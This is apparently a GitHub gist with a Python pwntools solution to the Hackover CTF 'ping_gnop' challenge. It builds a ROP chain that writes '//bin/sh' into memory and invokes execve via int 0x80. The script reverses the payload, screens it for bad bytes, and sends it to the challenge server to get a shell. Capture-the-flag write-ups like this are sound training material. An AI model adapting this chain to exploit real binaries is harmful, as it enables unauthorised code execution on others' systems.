Skip to content

Instantly share code, notes, and snippets.

@c3c
Created October 9, 2016 12:41
Show Gist options
  • Save c3c/d92df0137b378c03b56cb57370a6c868 to your computer and use it in GitHub Desktop.
Save c3c/d92df0137b378c03b56cb57370a6c868 to your computer and use it in GitHub Desktop.
Hackover CTF ping_gnop solution
from pwn import *
# the binary reverses our payload and checks for a number of bad bytes
# generated a ropchain and modified it to work
def ropchain():
# modified ropchain generated with ropper
# ropper's badbytes option didnt work correctly...
from struct import pack
p = lambda x : pack('I', x)
IMAGE_BASE_0 = 0x08048000 # ping
rebase_0 = lambda x : p(x + IMAGE_BASE_0)
rop = ''
# the pop eax instruction is bad, so replaced it with pop ecx; mov eax, ecx; pop; pop; ret
rop += p32(0x080e05f5) # pop ecx ; ret
rop += '//bi'
rop += p32(0x0806cfe5) # mov eax, ecx ; pop esi; pop edi ; ret
rop += p32(0xdeadbeef)*2
rop += rebase_0(0x00027e6a) # pop edx; ret;
rop += rebase_0(0x000a4004)
rop += rebase_0(0x0000d96b) # mov dword ptr [edx], eax; ret;
rop += p32(0x080e05f5) # pop ecx ; ret
rop += 'n/sh'
rop += p32(0x0806cfe5) # mov eax, ecx ; pop esi; pop edi; ret
rop += p32(0xdeadbeef)*2
rop += rebase_0(0x00027e6a) # pop edx; ret;
rop += rebase_0(0x000a4008)
rop += rebase_0(0x0000d96b) # mov dword ptr [edx], eax; ret;
rop += rebase_0(0x00001573) # xor eax, eax; ret;
rop += rebase_0(0x00027e6a) # pop edx; ret;
rop += rebase_0(0x000a4010)
rop += p32(0x080e13fe)*4 # decrease edx to 0c again
rop += rebase_0(0x0000d96b) # mov dword ptr [edx], eax; ret;
rop += rebase_0(0x0000783c) # pop ebx; ret;
rop += rebase_0(0x000a4004)
rop += rebase_0(0x000985f5) # pop ecx; ret;
rop += rebase_0(0x000a4010)
rop += p32(0x080e215d)*4 # decrease ecx to 0c again
rop += rebase_0(0x00027e6a) # pop edx; ret;
rop += rebase_0(0x000a4010)
rop += p32(0x080e13fe)*4 # decrease edx to 0c again
rop += rebase_0(0x00001573) # xor eax, eax; ret;
rop += rebase_0(0x00015633) # inc eax; pop edi; ret;
rop += p(0xdeadbeef)
rop += rebase_0(0x00015633) # inc eax; pop edi; ret;
rop += p(0xdeadbeef)
rop += rebase_0(0x00015633) # inc eax; pop edi; ret;
rop += p(0xdeadbeef)
rop += rebase_0(0x00015633) # inc eax; pop edi; ret;
rop += p(0xdeadbeef)
rop += rebase_0(0x00015633) # inc eax; pop edi; ret;
rop += p(0xdeadbeef)
rop += rebase_0(0x00015633) # inc eax; pop edi; ret;
rop += p(0xdeadbeef)
rop += rebase_0(0x00015633) # inc eax; pop edi; ret;
rop += p(0xdeadbeef)
rop += rebase_0(0x00015633) # inc eax; pop edi; ret;
rop += p(0xdeadbeef)
rop += rebase_0(0x00015633) # inc eax; pop edi; ret;
rop += p(0xdeadbeef)
rop += rebase_0(0x00015633) # inc eax; pop edi; ret;
rop += p(0xdeadbeef)
rop += rebase_0(0x00015633) # inc eax; pop edi; ret;
rop += p(0xdeadbeef)
rop += rebase_0(0x000259c5) # cd80;
return rop
#r = process("./ping", shell=True)
r = remote("challenges.hackover.h4q.it", 1337)
rop = ropchain()
revchain = rop.ljust(446, "A")[::-1]
"""
(gdb) x/8x 0x080bcec8
0x80bcec8: 0xba 0xc4 0x07 0x1c 0xd1 0xac 0x83 0x03
badbytes = bac4071cd1ac830300
badbytes += 0a0d200b0c09 (isspace bytes for scanf)
"""
# check for badbytes
assert not any(c in unhex("bac4071cd1ac8303000a0d200b0c09") for c in revchain)
r.sendline(revchain + "A"*24 + p32(0x1337CAFE)[::-1] + "C"*1000)
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment